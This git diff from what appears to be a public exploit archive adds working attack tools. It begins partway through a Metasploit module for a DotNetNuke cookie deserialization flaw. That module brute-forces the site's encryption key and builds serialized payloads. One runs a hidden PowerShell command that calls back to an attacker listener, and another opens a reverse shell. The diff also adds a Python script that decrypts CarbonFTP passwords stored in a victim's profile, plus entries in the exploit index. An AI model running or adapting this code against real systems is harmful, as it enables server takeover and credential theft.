+ if (!key.blank? && !iv.blank?)
+ @passphrase = key + iv
+ # Key and IV were supplied, don't try and decrypt.
+ @try_decrypt = false
+ elsif (!@verification_codes.empty? && !@kpt.blank?)
+ @try_decrypt = true
+ else
+ fail_with(Failure::BadConfig, "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).")
+ end
+ end
+
+ if target['ReqSession']
+ if @session_token.blank?
+ fail_with(Failure::BadConfig, "Target requires a valid SESSION_TOKEN for exploitation.")
+ end
+ end
+
+ if @encrypted && @try_decrypt
+ # Set IV for decryption as the known plaintext, manually
+ # apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed.
+ # For v9.1.1 - v9.2.1 this will find the valid KEY and IV value in real time.
+ # For v9.2.2+ it will find an initial base key faster than if padding were enabled.
+ f8_plain = @kpt[0, 8]
+ c_iv = f8_plain.unpack("C*") + [8 - f8_plain.length] * (8 - f8_plain.length)
+ @decryptor.iv = String.new(c_iv.pack("C*"))
+ @decryptor.padding = 0
+
+ key = find_key(@verification_codes[0])
+ if key.blank?
+ return
+ end
+
+ if @target_idx == 4
+ # target is v9.2.2+, requires base64 generated key and IV values.
+ generate_base_keys(0, key.each_byte.to_a, "")
+ vprint_status("Generated #{@possible_keys.size} possible base KEY values from #{key}")
+
+ # re-enable padding here as it doesn't have the
+ # same performance impact when trying to find possible IV values.
+ @decryptor.padding = 1
+
+ print_warning("Finding possible base IVs. This may take a few minutes...")
+ start = Time.now
+ find_ivs(@verification_codes, key)
+ elapsed = Time.now - start
+ vprint_status(
+ format(
+ "Found %<n_ivs>d potential Base IV values using %<n_codes>d "\
+ "verification codes in %<e_time>.2f seconds.",
+ n_ivs: @possible_ivs.size,
+ n_codes: @verification_codes.size,
+ e_time: elapsed.to_s
+ )
+ )
+
+ generate_payload_passphrases
+ vprint_status(format("Generated %<n_phrases>d possible base64 KEY and IV combinations.", n_phrases: @passphrases.size))
+ end
+
+ if @passphrase.blank?
+ # test all generated passphrases by
+ # sending an exploit payload to the target
+ # that will callback to an HTTP listener
+ # with the index of the passphrase that worked.
+
+ # set SRVHOST as LHOST value for HTTPServer mixin
+ datastore['SRVHOST'] = datastore['LHOST']
+ print_warning("Trying all possible KEY and IV combinations...")
+ print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
+ start_service
+ vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
+
+ test_passphrases
+
+ # If no working passphrase has been found,
+ # wait to allow the the chance for the last one to callback.
+ if @passphrase.empty? && !@dry_run
+ sleep(wfs_delay)
+ end
+ if service
+ stop_service
+ end
+ print "\r\n"
+ if !@passphrase.empty?
+ print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
+ end
+ end
+ end
+ send_exploit_payload
+ end
+
+ # =====================
+ # For the check command
+ # =====================
+ def check
+ if target.name == 'Automatic'
+ select_target
+ end
+
+ @target_idx = Integer(datastore['TARGET'])
+
+ if @target_idx == 0
+ fail_with(Failure::NoTarget, 'No valid target found or specified.')
+ end
+
+ # Check if 404 page is custom or not.
+ # Vulnerability requires custom 404 handling (enabled by default).
+ uri = normalize_uri(target_uri.path)
+ print_status("Checking for custom error page at: #{uri} ...")
+ res = send_request_cgi(
+ 'uri' => uri
+ )
+
+ if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
+ print_good("Custom error page detected.")
+ else
+ print_error("IIS Error Page detected.")
+ return Exploit::CheckCode::Safe
+ end
+ return Exploit::CheckCode::Appears
+ end
+
+ # ===========================
+ # Auto-select target version
+ # ===========================
+ def select_target
+ print_status("Trying to determine DNN Version...")
+ # Check for copyright version in /Documentation/license.txt
+ uri = %r{^(.*[\\\/])}.match(target_uri.path)[0]
+ vprint_status("Checking version at #{normalize_uri(uri + 'Documentation', 'License.txt')} ...")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri + 'Documentation', 'License.txt')
+ )
+ year = -1
+ if res && res.code == 200
+ # License page found, get latest copyright year.
+ matches = @cr_regex.match(res.body)
+ if matches
+ year = matches[0].to_i
+ end
+ else
+ vprint_status("Checking version at #{uri} ...")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri)
+ )
+ if res && res.code == 200
+ # Check if copyright info is in page HTML.
+ matches = @cr_regex.match(res.body)
+ if matches
+ year = matches[0].to_i
+ end
+ end
+ end
+
+ if year >= 2018
+ print_warning(
+ %q(DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN.
+Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2.
+Try setting target 4 and supply a file of of verification codes or specifiy valid Key and IV values.")
+ )
+ datastore['TARGET'] = 3
+ elsif year == 2017
+ print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED')
+ datastore['TARGET'] = 2
+ elsif year < 2017 && year > 2008
+ print_good("DNN Version Found: v5.1.0 - v9.0.1")
+ datastore['TARGET'] = 1
+ elsif year == 2008
+ print_warning("DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).")
+ datastore['TARGET'] = 1
+ else
+ print_warning("Could not determine DNN version. Target may still be vulnerable. Manually set the Target value")
+ end
+ end
+
+ # ==============================
+ # Known plaintext attack to
+ # brute-force the encryption key
+ # ==============================
+ def find_key(cipher_text)
+ print_status("Finding Key...")
+
+ # Counter
+ total_keys = @key_charset.length**8
+ i = 1
+
+ # Set start time
+ start = Time.now
+
+ # First char
+ @key_charset.each_byte do |a|
+ key = a.chr
+ # 2
+ @key_charset.each_byte do |b|
+ key[1] = b.chr
+ # 3
+ @key_charset.each_byte do |c|
+ key[2] = c.chr
+ # 4
+ @key_charset.each_byte do |d|
+ key[3] = d.chr
+ # 5
+ @key_charset.each_byte do |e|
+ key[4] = e.chr
+ # 6
+ @key_charset.each_byte do |f|
+ key[5] = f.chr
+ # 7
+ @key_charset.each_byte do |g|
+ key[6] = g.chr
+ # 8
+ @key_charset.each_byte do |h|
+ key[7] = h.chr
+ if decrypt_data_and_iv(@decryptor, cipher_text, String.new(key))
+ elapsed = Time.now - start
+ print_search_status(i, elapsed, total_keys)
+ print_line
+ if @target_idx == 4
+ print_good("Possible Base Key Value Found: " + key)
+ else
+ print_good("KEY Found: " + key)
+ print_good("IV Found: " + @passphrase[8..-1])
+ end
+ vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
+ vprint_status(format("Time to crack: %<c_time>.3f seconds", c_time: elapsed.to_s))
+ return String.new(key)
+ end
+ # Print timing info every 5 million attempts
+ if i % 5000000 == 0
+ print_search_status(i, Time.now - start, total_keys)
+ end
+ i += 1
+ end
+ end
+ end
+ end
+ end
+ end
+ end
+ end
+ elapsed = Time.now - start
+ print_search_status(i, elapsed, total_keys)
+ print_line
+ print_error("Key not found")
+ vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
+ vprint_status(format("Time run: %<r_time>.3f seconds", r_time: elapsed.to_s))
+ return nil
+ end
+
+ # ==================================
+ # Attempt to decrypt a ciphertext
+ # and obtain the IV at the same time
+ # ==================================
+ def decrypt_data_and_iv(cipher, cipher_text, key)
+ cipher.key = key
+ begin
+ plaintext = cipher.update(cipher_text) + cipher.final
+ if @target_idx == 4
+ # Target is v9.2.2+
+ user_id = plaintext[8, @user_id_pt_length]
+ if @user_id_regex.match(user_id)
+ return true
+ end
+
+ return false
+ end
+
+ # This should only execute if the version is 9.1.1 - 9.2.1
+ iv = plaintext[0, 8]
+ if !@iv_regex.match(iv)
+ return false
+ end
+
+ # Build encryption passphrase as DNN does.
+ @passphrase = key + iv
+
+ # Encrypt the plaintext value using the discovered key and IV
+ # and compare with the initial ciphertext
+ if cipher_text == encrypt_data(@encryptor, @kpt, @passphrase)
+ @passphrases.push(String.new(key + iv))
+ return true
+ end
+ rescue StandardError
+ # Ignore decryption errors to allow execution to continue
+ return false
+ end
+ return false
+ end
+
+ def print_search_status(num_tries, elapsed, max_tries)
+ msg = format("Searching at %<s_rate>.3f keys/s ...... %<p_complete>.2f%% of keyspace complete.", s_rate: num_tries / elapsed, p_complete: (num_tries / max_tries.to_f) * 100)
+ print("\r%bld%blu[*]%clr #{msg}")
+ end
+
+ # ===========================
+ # Encrypt data using the same
+ # pattern that DNN uses.
+ # ===========================
+ def encrypt_data(cipher, message, passphrase)
+ cipher.key = passphrase[0, 8]
+ cipher.iv = passphrase[8, 8]
+ return cipher.update(message) + cipher.final
+ end
+
+ # ===============================================
+ # Generate all possible base key values
+ # used to create the final passphrase in v9.2.2+.
+ # DES weakness allows multiple bytes to be
+ # interpreted as the same value.
+ # ===============================================
+ def generate_base_keys(pos, from_key, new_key)
+ if !@unchanged.include? from_key[pos]
+ if from_key[pos] % 2 == 0
+ new_key[pos] = (from_key[pos] + 1).chr
+ else
+ new_key[pos] = (from_key[pos] - 1).chr
+ end
+
+ if new_key.length == 8
+ @possible_keys.add(String.new(new_key))
+
+ # also add key with original value
+ new_key[pos] = (from_key[pos]).chr
+ @possible_keys.add(String.new(new_key))
+ else
+ generate_base_keys(pos + 1, from_key, String.new(new_key))
+
+ # also generate keys with original value
+ new_key[pos] = (from_key[pos]).chr
+ generate_base_keys(pos + 1, from_key, String.new(new_key))
+ end
+ else
+ new_key[pos] = (from_key[pos]).chr
+ if new_key.length == 8
+ @possible_keys.add(String.new(new_key))
+ else
+ generate_base_keys(pos + 1, from_key, String.new(new_key))
+ end
+ end
+ end
+
+ # ==============================================
+ # Find all possible base IV values
+ # used to create the final Encryption passphrase
+ # ==============================================
+ def find_ivs(cipher_texts, key)
+ num_chars = 8 - @kpt.length
+ f8regex = /#{@kpt}[0-9a-f]{#{num_chars}}/
+
+ @decryptor.key = key
+ found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
+ # Find all possible IVs for the first ciphertext
+ brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
+
+ # Reduce IV set by testing against other ciphertexts
+ cipher_texts.drop(1).each do |cipher_text|
+ @possible_ivs.each do |iv|
+ @decryptor.iv = iv
+ pt = @decryptor.update(cipher_text) + @decryptor.final
+ if !f8regex.match(pt[0, 8])
+ @possible_ivs.delete(iv)
+ end
+ end
+ end
+ end
+
+ # ==========================================
+ # A recursive function to find all
+ # possible valid IV values using brute-force
+ # ==========================================
+ def brute_force_ivs(pt_prefix, num_chars_needed, cipher_text, key, found_pt)
+ charset = "0123456789abcdef"
+ if num_chars_needed == 0
+ @decryptor.key = key
+ @decryptor.iv = pt_prefix
+ pt = @decryptor.update(cipher_text) + @decryptor.final
+ iv = pt[0, 8]
+ if @iv_regex.match(iv)
+ pt = pt_prefix + found_pt
+ if encrypt_data(@encryptor, pt, key + iv) == cipher_text
+ @possible_ivs.add(String.new(iv))
+ end
+ end
+ return
+ end
+ charset.length.times do |i|
+ brute_force_ivs(String.new(pt_prefix + charset[i]), num_chars_needed - 1, cipher_text, key, found_pt)
+ end
+ end
+
+ # ========================================
+ # Generate all possible payload encryption
+ # passphrases for a v9.2.2+ target
+ # ========================================
+ def generate_payload_passphrases
+ phrases = Set.new(@passphrases)
+ @possible_keys.each do |key|
+ @possible_ivs.each do |iv|
+ phrase = Rex::Text.encode_base64(
+ encrypt_data(@encryptor, key + iv, key + iv)
+ )
+ phrases.add(String.new(phrase[0, 16]))
+ end
+ end
+ @passphrases = phrases.to_a
+ end
+
+ # ===========================================
+ # Test all generated passphrases by initializing
+ # an HTTP server to listen for a callback that
+ # contains the index of the successful passphrase.
+ # ===========================================
+ def test_passphrases
+ for i in 0..@passphrases.size - 1
+ # Stop sending if we've found the passphrase
+ if !@passphrase.empty?
+ break
+ end
+
+ msg = format("Trying KEY and IV combination %<current>d of %<total>d...", current: i + 1, total: @passphrases.size)
+ print("\r%bld%blu[*]%clr #{msg}")
+
+ url = "#{get_uri}?#{get_resource.delete('/')}=#{i}"
+ payload = create_request_payload(url)
+ cookie = create_cookie(payload)
+
+ # Encrypt cookie value
+ enc_cookie = Rex::Text.encode_base64(
+ encrypt_data(@encryptor, cookie, @passphrases[i])
+ )
+ if @dry_run
+ print_line
+ print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
+ print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...")
+ print_line(enc_cookie)
+ break
+ end
+ execute_command(enc_cookie, host: datastore['RHOST'])
+ end
+ end
+
+ # ===============================
+ # Request handler for HTTP server.
+ # ==============================
+ def on_request_uri(cli, request)
+ # Send 404 to prevent scanner detection
+ send_not_found(cli)
+
+ # Get found index - should be the only query string parameter
+ if request.qstring.size == 1 && request.qstring[get_resource.delete('/').to_s]
+ index = request.qstring[get_resource.delete('/').to_s].to_i
+ @passphrase = String.new(@passphrases[index])
+ end
+ end
+
+ # ==============================================
+ # Create payload to callback to the HTTP server.
+ # Note: This technically exploits the
+ # vulnerability, but provides a way to determine
+ # the valid passphrase needed to exploit again.
+ # ==============================================
+ def create_request_payload(url)
+ psh_cmd = "/b /c start /b /min powershell.exe -nop -w hidden -noni -Command \"Invoke-WebRequest '#{url}'\""
+ psh_cmd_bytes = psh_cmd.bytes.to_a
+
+ cmd_size_bytes = write_encoded_int(psh_cmd.length)
+
+ # Package payload into serialized object
+ payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
+
+ object_size = write_encoded_int(payload_object.length)
+
+ # Create the final seralized ObjectStateFormatter payload
+ final_payload = @osf_header + object_size + payload_object
+
+ b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
+ return b64_payload
+ end
+
+ # =============================================
+ # Reproduce the WriteEncoded method in
+ # the native .NET ObjectStateFormatter.cs file.
+ # =============================================
+ def write_encoded_int(value)
+ enc = []
+ while (value >= 0x80)
+ v = value | 0x80
+ enc.push([v].pack("V")[0].unpack1("C*"))
+ value >>= 7
+ end
+ enc.push([value].pack("V")[0].unpack1("C*"))
+ return enc
+ end
+
+ # =================================
+ # Creates the payload cookie
+ # using the specified payload
+ # =================================
+ def create_cookie(payload)
+ cookie = "<profile>"\
+ "<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\
+ "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\
+ "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\
+ "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\
+ "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\
+ "<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
+ "<ProjectedProperty0>"\
+ "<MethodName>Deserialize</MethodName>"\
+ "<MethodParameters>"\
+ "<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
+ "xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\" "\
+ ">#{payload}</anyType>"\
+ "</MethodParameters>"\
+ "<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
+ "i:type=\"ObjectStateFormatter\" />"\
+ "</ProjectedProperty0>"\
+ "</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
+ "</item>"\
+ "</profile>"
+ return cookie
+ end
+
+ # =========================================
+ # Send the payload to the target server.
+ # =========================================
+ def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port })
+ uri = normalize_uri(target_uri.path)
+
+ res = send_request_cgi(
+ 'uri' => uri,
+ 'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};"
+ )
+ if !res
+ fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.")
+ elsif res.code == 404
+ return true
+ elsif res.code == 400
+ fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
+ else
+ fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}")
+ end
+ end
+
+ # ======================================
+ # Create and send final exploit payload
+ # to obtain a reverse shell.
+ # ======================================
+ def send_exploit_payload
+ cmd_payload = create_payload
+ cookie_payload = create_cookie(cmd_payload)
+ if @encrypted
+ if @passphrase.blank?
+ print_error("Target requires encrypted payload, but a passphrase was not found or specified.")
+ return
+ end
+ cookie_payload = Rex::Text.encode_base64(
+ encrypt_data(@encryptor, cookie_payload, @passphrase)
+ )
+ end
+ if @dry_run
+ print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
+ print_warning("Printing exploit cookie payload...")
+ print_line(cookie_payload)
+ return
+ end
+
+ # Set up the payload handlers
+ payload_instance.setup_handler
+
+ # Start the payload handler
+ payload_instance.start_handler
+
+ print_status("Sending Exploit Payload to: #{normalize_uri(target_uri.path)} ...")
+ execute_command(cookie_payload, host: datastore['RHOST'])
+ end
+
+ # ===================================
+ # Create final exploit paylod based on
+ # supplied payload options.
+ # ===================================
+ def create_payload
+ # Create payload
+ psh_cmd = "/b /c start /b /min " + cmd_psh_payload(
+ payload.encoded,
+ payload_instance.arch.first,
+ remove_comspec: true, encode_final_payload: false
+ )
+
+ psh_cmd_bytes = psh_cmd.bytes.to_a
+ cmd_size_bytes = write_encoded_int(psh_cmd.length)
+
+ # Package payload into serialized object
+ payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
+ object_size = write_encoded_int(payload_object.length)
+
+ # Create the final seralized ObjectStateFormatter payload
+ final_payload = @osf_header + object_size + payload_object
+ b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
+
+ vprint_status("Payload Object Created.")
+
+ return b64_payload
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/48363.py b/exploits/windows/remote/48363.py
new file mode 100755
index 000000000..2f30aa3ce
--- /dev/null
+++ b/exploits/windows/remote/48363.py
@@ -0,0 +1,241 @@
+# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
+# Date: 2020-04-20
+# Author: hyp3rlinx
+# Vendor:
+# CVE: CVE-2020-6857
+
+import time, string, sys, argparse, os, codecs
+
+#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
+#This should be compatible for Python 2 and 3 versions now, tested successfully.
+#Sample test password
+#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
+
+key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
+chunk_sz=5 #number of bytes we must decrypt the password by.
+
+#Password is stored here:
+#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
+
+#Neowise CarbonFTP v1.4
+#Insecure Proprietary Password Encryption
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#===================================================
+
+def carbonftp_conf(conf_file):
+ p=""
+ pipe=-1
+ passwd=""
+ lst_of_passwds=[]
+ try:
+ for p in conf_file:
+ idx = p.find("Password=STRING|")
+ if idx != -1:
+ pipe = p.find("|")
+ if pipe != -1:
+ passwd = p[pipe + 2: -2]
+ print(" Password found: "+ passwd)
+ lst_of_passwds.append(passwd)
+ except Exception as e:
+ print(str(e))
+ return lst_of_passwds
+
+
+def reorder(lst):
+ k=1
+ j=0
+ for n in range(len(lst)):
+ k+=1
+ j+=1
+ try:
+ tmp = lst[n+k]
+ a = lst[n+j]
+ lst[n+j] = tmp
+ lst[n+k] = a
+ except Exception as e:
+ pass
+ return ''.join(lst)
+
+
+def dec2hex(dec):
+ tmp = str(hex(int(dec)))
+ return str(tmp[2:])
+
+
+#Updated for Python version compatibility.
+def hex2ascii(h):
+ h=h.strip()
+ passwd=""
+ try:
+ passwd = codecs.decode(h, "hex").decode("ascii")
+ except Exception as e:
+ print("[!] In hex2ascii(), not a valid hex string.")
+ exit()
+ return passwd
+
+
+def chunk_passwd(passwd_lst):
+ lst = []
+ for passwd in passwd_lst:
+ while passwd:
+ lst.append(passwd[:chunk_sz])
+ passwd = passwd[chunk_sz:]
+ return lst
+
+
+def strip_non_printable_char(str):
+ return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
+
+cnt = 0
+passwd_str=""
+def deob(c):
+
+ global cnt, passwd_str
+
+ tmp=""
+
+ try:
+ tmp = int(c) - int(key, 16)
+ tmp = dec2hex(tmp)
+ except Exception as e:
+ print("[!] Not a valid CarbonFTP encrypted password.")
+ exit()
+
+ b=""
+ a=""
+
+ #Seems we can delete the second char as its most always junk.
+ if cnt!=1:
+ a = tmp[:2]
+ cnt+=1
+ else:
+ b = tmp[:4]
+
+ passwd_str += strip_non_printable_char(hex2ascii(a + b))
+ hex_passwd_lst = list(passwd_str)
+ return hex_passwd_lst
+
+
+def no_unique_chars(lst):
+ c=0
+ k=1
+ j=0
+ for i in range(len(lst)):
+ k+=1
+ j+=1
+ try:
+ a = lst[i]
+ b = lst[i+1]
+ if a != b:
+ c+=1
+ elif c==0:
+ print("[!] Possible one char password?: " +str(lst[0]))
+ return lst[0]
+ except Exception as e:
+ pass
+ return False
+
+
+def decryptor(result_lst):
+
+ global passwd_str, sz
+
+ print(" Decrypting ... \n")
+ for i in result_lst:
+ print("[-] "+i)
+ time.sleep(0.1)
+ lst = deob(i)
+
+ #Re-order chars to correct sequence using custom swap function (reorder).
+ reordered_pass = reorder(lst)
+ sz = len(reordered_pass)
+
+ #Flag possible single char password.
+ no_unique_chars(lst)
+
+ print("[+] PASSWORD LENGTH: " + str(sz))
+ if sz == 9:
+ return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
+ reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
+
+ #Shorter passwords less then nine chars will have several candidates
+ #as they get padded with repeating chars so we return those.
+
+ passwd_str=""
+ return reordered_pass
+
+
+def display_cracked_passwd(sz, passwd):
+ if sz==9:
+ print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
+ else:
+ print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
+
+
+def parse_args():
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
+ parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
+ return parser.parse_args()
+
+
+def main(args):
+
+ global passwd_str, sz
+ victim=""
+
+ if args.user and args.encrypted_password:
+ print("[!] Supply a victims username -u or single encrypted password -p, not both.")
+ exit()
+
+ print("[+] Neowise CarbonFTP v1.4")
+ time.sleep(0.1)
+ print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
+ time.sleep(0.1)
+ print("[+] Version 2 Exploit fixed for Python 3 compatibility")
+ time.sleep(0.1)
+ print("[+] Discovered and cracked by hyp3rlinx")
+ time.sleep(0.1)
+ print("[+] ApparitionSec\n")
+ time.sleep(1)
+
+ #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
+ if args.user:
+ victim = args.user
+ os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
+ dir_lst = os.listdir(".")
+ for c in dir_lst:
+ f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
+ #Get encrypted password from conf file
+ passwd_enc = carbonftp_conf(f)
+ #Break up into 5 byte chunks as processed by the proprietary decryption routine.
+ result_lst = chunk_passwd(passwd_enc)
+ #Decrypt the 5 byte chunks and reassemble to the cleartext password.
+ cracked_passwd = decryptor(result_lst)
+ #Print cracked password or candidates.
+ display_cracked_passwd(sz, cracked_passwd)
+ time.sleep(0.3)
+ passwd_str=""
+ f.close()
+
+
+ #Crack a single password -p flag.
+ if args.encrypted_password:
+ passwd_to_crack_lst = []
+ passwd_to_crack_lst.append(args.encrypted_password)
+ result = chunk_passwd(passwd_to_crack_lst)
+ #Print cracked password or candidates.
+ cracked_passwd = decryptor(result)
+ display_cracked_passwd(sz, cracked_passwd)
+
+
+if __name__=="__main__":
+
+ parser = argparse.ArgumentParser()
+
+ if len(sys.argv)==1:
+ parser.print_help(sys.stderr)
+ exit()
+
+ main(parse_args())
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 083c698cc..b1b0f9065 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6692,6 +6692,17 @@ id,file,description,date,author,type,platform,port
48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
+48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
+48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
+48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
+48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10101,7 +10112,7 @@ id,file,description,date,author,type,platform,port
40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection",2016-12-18,"Hacker Fantastic",local,linux,
40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,
40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",local,aix,
-40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",local,linux,
+40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Jaka Hudoklin",local,linux,
40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",local,macos,
40957,exploits/macos/local/40957.c,"Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos,
40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",local,linux,
@@ -11011,6 +11022,23 @@ id,file,description,date,author,type,platform,port
48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
+48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
+48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
+48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
+48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
+48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
